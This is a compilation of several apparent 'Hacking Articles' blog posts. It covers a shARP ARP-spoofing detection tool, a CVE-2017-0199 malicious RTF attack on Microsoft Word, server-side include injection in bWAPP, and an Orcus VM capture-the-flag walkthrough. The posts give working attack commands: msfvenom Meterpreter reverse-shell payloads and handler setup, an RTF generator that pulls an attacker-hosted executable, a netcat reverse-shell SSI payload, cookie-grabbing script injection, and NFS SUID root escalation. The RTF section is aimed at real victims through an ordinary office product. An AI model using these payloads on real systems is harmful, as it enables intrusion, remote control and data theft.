NOW TRY YOURSELF GOOD LUCK!!!

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Exploit Windows 7 PC using Torrent File appeared first on Hacking Articles.

This article is written to introduce a new lunch tool shARP is an anti-ARP-spoofing program and uses active scanning process to identify any ARP-spoofing event.

ARP spoofing allows an attacker to intercept data frames on a network, modify the traffic, or stop all traffic. Often the attack is used as an opening for other attacks, such as denial of service, man in the middle, or session hijacking attacks. Our anti- ARP spoofing program, (shARP) detects the presence of a third party in a private network actively. It has 2 mode: defensive and offensive.

Defensive mode protects the end user from the spoofer by disconnecting the user’s system from the network and alerts the user by an audio message.

Offensive mode disconnects the user’s system from the network and further kicks out the attacker by sending de-authentication packets to his system, unable him to reconnect to the network until the program is manually reset.

The program creates a log file (/usr/shARP/) containing the details of the attack such as, the attackers Mac address, Mac vendor time and date of the attack. We can identify the NIC of the attackers system with the help of the obtained Mac address. If required the attacker can be permanently banned from the network by feeding his Mac address to the block list of the router.

Let’s start!

Open the terminal in kali Linux and type following command to download it

Git clone https://github.com/europa502/shARP.git

If the user wants to secure his network by scanning for any attacker he can run the program. The program offers a simple command line interface which makes it easy for the new users. Now type following command to run this program:

Chmod 777 shARP.sh

./sharp.sh -h

Then we had used zanti for sniffing in the network and start MIMT attack on selected target IP: 192.168.1.9 so that we can view its network traffic.

When the user runs the program in defensive mode, As soon as the program detects a spoofer in the network, and it disconnects the user’s system from the network so as to protect the private data being transferred between the system and the server. It also saves a log file about the attacker for further use.

./sharp.sh –d eth0

From screenshot you can the highlighted text is showing the Mac address of android phone try to perform spoofing.

Now when it finds spoofing in the network, it disconnects the user from the network. From screenshot you can see now user is assign only its localhost IP.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post How to Detect Sniffer in Your Network using shARP appeared first on Hacking Articles.

Microsoft word is vulnerable against malicious RTF file, in this article we had made a zero day attack on MS- word 2013 using python script which will generate a malicious .rtf file and give meterpreter session of targeted system.

Exploit toolkit CVE-2017-0199 – v2.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter / any other payload to victim without any complex configuration.

Let’s start!!!

Attacker: Kali Linux

Target: Windows 10 (Microsoft Word 2007 – 2013)

Open the terminal inside your kali Linux and type following to down this script.

Git clone https://github.com/bhdresh/CVE-2017-0199.git

Cd CVE-2017-0199

python cve-2017-0199_toolkit.py -M gen -w sales.rtf -u http://192.168.1.24/raj.doc

This command will run a python script to generate a rich text format payload where –M is used for generating rtf file –w is used for name of rtf file i.e. “sales.rtf” and –u for attacker’s IP address or domain name.

As you can figure out in the given screenshot that above command has generated a malicious sales .rtf file, now before we send this file to our victim we need to connect it with any backdoor file so that we can establish reverse connect with victim.

On a new terminal use msfvenom to prepare an exe payload for attack and type following.

Msfvenom –p windows/meterpreter/reverse_tcp lhost=192.168.1.24 lport=4444 –f exe > /root/Desktop/raj.exe

Now move raj.exe into /var/www/html.

Now type following command where it will merge raj.exe with sales.rtf. Then you have to share the updated rtf file with victim and start multi handler simultaneously for reverse connection of victims.

python cve-2017-0199_toolkit.py -M exp -e http://192.168.1.24/raj.exe -l /var/www/html/raj.exe

When victim will open sales file which will be in doc format in that mean time attacker will receive his meterpreter ssession inside metasploite framework.

msf > use multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.24

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

meterpreter > sysinfo

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Exploit Windows 10 PC with Microsoft RTF File (CVE-2017-0199) appeared first on Hacking Articles.

In this article you will learn how to exploit any server using server side include injection which is commonly known as SSI.

SSIs are directives present on Web applications used to feed an HTML page with dynamic contents. The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. The attacker can access sensitive information, such as password files, and execute shell commands. The SSI directives are injected in input fields and they are sent to the web server.

For more information visit owasp.org

Let’s begin

In your kali Linux open the target IP in browser: 192.168.1.103/bWAPP/login.php. Enter user and password as bee and bug respectively.

Set security level low, from list box chooses your bug select server side include injection now and click on hack

Now request web page will get open where you can see it is having two text fields for first name and last name respectfully.

Then I had given random name test: test as the first name and last name respectfully, to know what exactly I will receive when I will click on lookup tab. Here first name text filed is vulnerable to SSI injection.

when I clicked on lookup, a new wep page pop up on the window screen which was showning the IP 192.168.1.107 of my Kali Linux.

Now I will try to exploit this vulnerability by sending different types of malicious code into web application. If you will see following screenshot carefully here I had sent a script which will generate an alert prompt in window screen. To perform this you need to modify text field of first name and type following code inside it.

<script>alert(“hack”)</script>

So when again we will click on lookup then an alert prompt “hack” will pop up in the window screen. Hence it confirms that first name text filed is vulnerable.

If I am willing to fetch cookies of the web server then this can be possible here also. Only we need to type following script code in the same text filed.

<script>alert(document.cookie)</script>

Now again an alert prompt will pop up with server’s cookie, which we can use for further exploitation.

Using exec directive we can execute a server side command with cmd as parameters. Here I am trying to retrieve all lists of files and folder using following code.

<!–#exec cmd=”ls -a” –>

Wonderful!! So you can see without making proper compromise to the server we have got all present directories inside it.

Now at last finally we will try to access its remote shell using netcat which will help us for establishing a reverse connection with targeted system. Open a terminal to start netcat listener on port 4444 and type following inside vulnerable text filed as done above.

<!–#exec cmd=”nc 192.168.1.107 4444 -e /bin/bash” –>

So when again you will click on lookup tab you will get reverse connection through netcat shell as I have received in following image which means the web application server is hacked where we can execute following command to penetrate more and more.

pwd

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Server Side Injection Exploitation in bWapp appeared first on Hacking Articles.

Hello friends! Today again we are here with a new vulnerable hub challenge “ORCUS” design by Mr. Viper. Through this article we are sharing our work efforts which we have utilize to complete the challenge so that we can catch the flag and beat the goal of this VM machine. This machine contains 4 flags on this machine 1. Get a shell 2. Get root access 3. There is a post exploitation flag on the box 4. There is something on this box.

You can download it from here.

Let’s Breach!!

192.168.0.151 is the trget ip now as we know that enumeration must be the first step for gathering information of any victim so therefore I had used version scan through namp.

nmap -p- -sV 192.168.0.151

From screenshot you can see there are so many open ports but I will go with port 80.

Since port 80 was opened therefore I had explore target IP 192.168.0.151 in the browser but here I didn’t get any remarkable thing.

Without wasting time I choose another tool dirb for directories brute force attack. To start brute force attack for directories open the terminal and type following:

dirb http://192.168.0.151

Awesome! We have stepped up in right direction and dug out many directories but when you will see the given screenshot there I had highlighted the “backups” directories. So now I will go with backups directory.

In browser I explored 192.168.0.151/backups as URL, where I found a tar file “simple PHP Quiz-backup.tar.gz”. Without taking more time I just download it for further enumeration.

So after unzip when I open it I found php and html files inside it, keeping eyes on php files I choose db-conn.php for fetching more details in hop to get something related to database.

Finally after making many efforts I found database username and password as dbuser: dbpasswords respectively.

In dirb brute force attack we have found many directories once again if you will scroll up you will notice phpmyadmin directory in the above given screenshot. Now again I will move towards browser to explore 192.168.0.1.51/phpmyadmin in URL. Form given below screenshot you can observe I had entered above username and password here.

When you will give correct login credential it will allow you to login inside phpmyadmin page. From screenshot you can see I have successfully login inside it using above credential, here I found a database “zenphoto” and decided to move inside it for further details.

Now inside zenphoto I found a setup page which will update the configuration file for the database inside web server when we will fill the information in the given text field.

Here only we need to provide database username i.e. dbuser and database password i.e. dbpassword

Without disturbing other fields click on save which will start database zenphoto installation.

This will start installation when you will click on go tab given at the end of the page. The zenphoto setup will start installing theme and plug-in for your database after that you have to set your admin user and password.

Further click on given tab I agree to these terms and condition.

Now type name for new user as admin and typepassword: password and confirm password as shown in below image and then click on apply tab given at the top

Then login into zenphoto database using credential as admin: password. So now we are inside admin console where we have decided to upload an image but here we upload any zip file only.

Now use msfvenom to generate malicious PHP script and type following command.

msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 –f raw

From screenshot you can read the generated PHP script, at this instant we need to copy the text highlighted text further we will paste it inside text document and saved with shell.php after that create a new folder copy shell.php inside it and compress it.

Most important thing is to start multi handler inside metasploit.

Then come back to the Browser to upload your zip file, now browse your file and click on upload. Then explore following url 192.168.0.151/zenphoto/albums, from given image you can see our shell.php is successfully uploaded now click on it.

When you will click on shell.php you will get meterpreter session inside metasploit. Now type following command in order to catch the flag.

Meterpreter >cd /var/www

Meterpreter >ls

Meterpreter >cat flag.txt

Congrats! We have caught 1^st flag.

After so many efforts I found a folder kippo then I step towards it for more information.

Meterpreter >pwd

Meterpreter >cd ..

Meterpreter >cat etc/kippo/data/userdb.txt

Finally! Caught 2^nd flag also.

Now for root privilege escalation open a text document and following: reference

https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#suid-binary

Then save it as raj.c on the desktop.

Now upload raj.c file for compiling and gain root access as shown in following image.

Meterpreter >upload/root/Desktop/raj.c

Meterpreter >shell

gcc -o raj raj.c

Since we know from the nmap’s result nfs port was open in targeted IP so taking advantage of it we will mount tmp ‘s data in url Kali Linux. Now create a folder mount data inside it.

mount -t nfs 192.168.0.151:/tmp mount

Chown root: root raj

Chmod u+s raj

./raj

Cd /root

Cat flag.txt

Grate!! We have Caught 3^rd flag also.

Now try yourself to find out one more flag.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Hack the Orcus VM CTF Challenge appeared first on Hacking Articles.